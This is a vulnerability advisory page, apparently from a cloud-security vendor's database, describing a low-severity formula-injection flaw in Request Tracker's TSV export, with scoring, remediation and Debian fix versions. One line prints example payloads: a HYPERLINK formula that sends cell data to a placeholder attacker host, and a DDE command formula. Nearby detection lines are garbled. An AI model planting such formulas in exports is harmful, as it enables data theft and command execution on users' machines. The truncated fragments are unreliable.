
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-61873 is a CSV Injection vulnerability in Best Practical Request Tracker (RT) that allows malicious ticket values to inject formula elements when TSV export is used. It affects RT versions before 4.4.9, 5.0.9, and 6.0.2. The CVE was published on January 16, 2026, and is classified under CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). It carries a CVSS v3.1 base score of 2.6 (Low), assigned by MITRE (NVD).
The vulnerability stems from insufficient sanitization of ticket field values before they are included in TSV (Tab-Separated Values) export output, classified as CWE-1236. An attacker with high privileges can craft ticket values containing formula injection payloads (e.g., strings beginning with =, +, -, or @) that are written verbatim into the exported file. When a user with sufficient privileges exports tickets and opens the resulting file in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the injected formulas may execute in the context of that application. Exploitation requires high attacker privileges, high attack complexity, and user interaction (opening the exported file), limiting the practical attack surface (NVD).
Successful exploitation results in a limited integrity impact within the scope of the spreadsheet application that opens the exported TSV file; there is no confidentiality or availability impact. The changed scope indicator reflects that the impact extends beyond the RT application itself to the client-side spreadsheet environment. In practice, an attacker could use injected formulas to perform actions such as exfiltrating data visible in the spreadsheet, executing local commands (in older or misconfigured spreadsheet applications), or deceiving users through manipulated displayed values (NVD).
There is no known public proof-of-concept exploit code or evidence of in-the-wild exploitation for CVE-2025-61873. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an attacker to already hold high privileges within the RT instance, significantly limiting the realistic threat (NVD).
=HYPERLINK("http://attacker.com/"&A1,"Click") or =cmd|' /C calc'!A0.=, +, -, @) at the start of field values; TSV export actions logged shortly after such modifications.=, +, -, @) in ticket data fields.HYPERLINK or similar functions).Best Practical has released patched versions addressing this vulnerability: RT 4.4.9, 5.0.9, and 6.0.2. Administrators should upgrade to one of these versions as the primary remediation (NVD, RT Release Notes). As a workaround prior to patching, users should avoid opening RT TSV exports directly in spreadsheet applications, or use a text editor to inspect exported files before opening them. Debian users should apply the distribution-provided security updates (e.g., DSA-6032-1 or DLA-4349-1) as applicable.
Tenable published Nessus detection plugins (e.g., plugin 271215, 271494, 271581) for this vulnerability shortly after disclosure, enabling automated scanning. Debian issued security advisories (DSA-6032-1 and DLA-4349-1) addressing the vulnerability in their packaged versions of Request Tracker. Coverage has been limited to routine vulnerability tracking outlets, with no notable researcher commentary or significant social media discussion, consistent with the low severity and high exploitation prerequisites of this issue.
Fix availability across major Linux distributions and their releases.
bookworm
request-tracker5: 5.0.3+dfsg-3~deb12u4
sid
request-tracker5: 5.0.7+dfsg-5
trixie
request-tracker5: 5.0.7+dfsg-4+deb13u1
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."